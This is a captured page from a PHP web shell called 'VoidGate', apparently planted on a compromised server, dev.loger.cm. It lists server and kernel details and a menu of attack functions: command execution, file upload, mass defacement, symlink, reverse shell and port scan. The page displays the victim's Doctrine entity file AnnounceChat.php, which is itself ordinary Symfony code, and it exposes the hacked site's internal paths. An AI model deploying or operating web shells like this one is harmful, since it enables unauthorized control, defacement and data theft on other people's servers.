ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
src
/
Entity
/
Viewing: AnnounceChat.php
<?php namespace App\Entity; use App\Repository\AnnounceChatRepository; use Doctrine\ORM\Mapping as ORM; use ApiPlatform\Core\Annotation\ApiResource; /** @ApiResource() * @ORM\Entity(repositoryClass=AnnounceChatRepository::class) */ class AnnounceChat { /** * @ORM\Id * @ORM\GeneratedValue * @ORM\Column(type="integer") */ private $id; /** * @ORM\Column(type="text") */ private $message; /** * @ORM\ManyToOne(targetEntity=User::class, inversedBy="announceChats") * @ORM\JoinColumn(nullable=false) */ private $sendBy; /** * @ORM\Column(type="datetime") */ private $createdAt; /** * @ORM\Column(type="string", length=255) */ private $messageType; /** * @ORM\ManyToOne(targetEntity=AnnounceChannel::class, inversedBy="announceChats") * @ORM\JoinColumn(nullable=false) */ private $channel; /** * @ORM\Column(type="boolean", nullable=true) */ private $vue; public function getId(): ?int { return $this->id; } public function getMessage(): ?string { return $this->message; } public function setMessage(string $message): self { $this->message = $message; return $this; } public function getSendBy(): ?User { return $this->sendBy; } public function setSendBy(?User $sendBy): self { $this->sendBy = $sendBy; return $this; } public function __construct() { $this->createdAt = new \DateTime( ); $this->setVue(false); } public function getCreatedAt(): ?\DateTimeInterface { return $this->createdAt; } public function setCreatedAt(\DateTimeInterface $createdAt): self { $this->createdAt = $createdAt; return $this; } public function getMessageType(): ?string { return $this->messageType; } public function setMessageType(string $messageType): self { $this->messageType = $messageType; return $this; } public function getChannel(): ?AnnounceChannel { return $this->channel; } public function setChannel(?AnnounceChannel $channel): self { $this->channel = $channel; return $this; } public function isVue(): ?bool { return $this->vue; } public function setVue(?bool $vue): self { $this->vue = $vue; return $this; } }
Coded With 💗 by
0x6ick